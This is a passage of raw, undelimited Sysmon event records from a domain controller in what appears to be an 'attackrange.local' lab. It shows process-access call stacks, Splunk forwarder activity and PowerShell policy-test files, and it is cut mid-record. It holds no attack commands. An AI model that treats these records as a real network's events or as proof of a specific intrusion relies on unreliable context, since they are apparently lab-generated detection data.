12:01:04.658{266CAFBE-646A-6064-0B00-00000000AE01}856896C:\Windows\system32\lsass.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 22542200x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.414{266CAFBE-646A-6064-0B00-00000000AE01}856win-dc-892010.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.412{266CAFBE-647D-6064-3000-00000000AE01}2648win-dc-892.attackrange.local0fe80::8c4d:e56a:c9ce:fd2b;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 17141700x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:01:04.487{266CAFBE-647F-6064-5000-00000000AE01}3024\PSHost.132616656634124279.3024.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.487{266CAFBE-647F-6064-5000-00000000AE01}3024NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_cgruhrrd.izv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.487{266CAFBE-647F-6064-5000-00000000AE01}3024NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_tjjeaadm.5ar.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-6480-6064-5400-00000000AE01}23322560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.414{266CAFBE-6480-6064-5500-00000000AE01}4012C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warnings 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.410{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:04.393{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6480-6064-5400-00000000AE01}2332C:\Program 